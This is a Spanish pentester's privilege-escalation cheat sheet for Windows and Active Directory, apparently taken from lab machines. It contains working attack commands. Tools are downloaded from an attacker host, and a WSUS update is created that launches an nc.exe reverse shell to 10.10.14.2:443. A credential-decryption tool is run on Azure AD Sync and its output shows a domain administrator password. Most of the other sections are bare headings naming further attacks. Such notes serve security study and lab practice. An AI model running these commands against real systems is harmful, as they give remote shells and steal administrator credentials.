Privesc
privesc
Privesc
Abuso del grupo WSUS Administrator
Archivos necesarios
iwr -uri http://10.10.14.2/SharpWSUS.exe -o SharpWSUS.exe
iwr -uri http://10.10.14.2/PsExec64.exe -o PsExec64.exe
iwr -uri http://10.10.14.2/nc.exe -o nc.exeReverse Shell
.\SharpWSUS.exe create /payload:"C:\Windows\Temp\Privesc\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c C:\\Windows\Temp\Privesc\\nc.exe -e cmd 10.10.14.2 443" /title:"ReverseShell"Abuso del grupo Azure Admins
*Evil-WinRM* PS C:\Temp> iwr -uri http://10.10.16.9/AdDecrypt.exe -o AdDecrypt.exe
*Evil-WinRM* PS C:\Temp> iwr -uri http://10.10.16.9/mcrypt.dll -o mcrypt.dll
*Evil-WinRM* PS C:\> cd "C:\Program Files\Microsoft Azure AD Sync\bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Temp\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCALAbuso del grupo DNSAdmins

Creación de binario para la reverse shell
Inserción en un servicio
Reiniciar servicio
Abuso del grupo Server Operators
Listar servicios
Modificación del BinPath de un servicio
Reinicio del proceso
Credenciales cacheadas
Firefox
Uso de firepwd.py
Primero copiar al directorio actual de trabajo el key4.db y el login.json
Listar reglas de Firewall
Abuso del privilegio SeImpersonatePrivileage
Uso de JuicyPotato
Uso de Named Pipes
Para ello es necesario aprovecharse de una tarea CRON en la que otro usuario se atachée a un named pipe alojado del atacante, de forma que se pueda impersonar para ejecutar comandos como este
Path
La estructura de llamada es asÃ
Explotación
En caso de ser vulnerable, el script en PowerShell de decoder_it, debe devolver el nombre de usuario que se ha conectado
Alteración del script
Abuso del servicio userlogger
Detener el servicio
Explotación
Pasarle como argumento un fichero con dos puntos al final. Se le asignarán privilegios de lectura y escritura para cualquier usuario
Iniciar servicio
Obtener contenido ADS
Dumpeo de hashes NT
Obtener procesos por Identificador
Decrypt groups.xml
Golden Ticket Attack
Abuso de certificados
Abuso de ENROLLEE_SUPPLIES_SUBJECT
Puedo tratar de crear un nuevo certificado a partir de un principal ya existente en el sistema y pasarselo a Rubeus para obtener un hash NT del usuario Administrador. Para poder crearlo necesito importar ADCS.ps1 a la máquina (Active Directory Cerficate Services) y PowerView.ps1
Last updated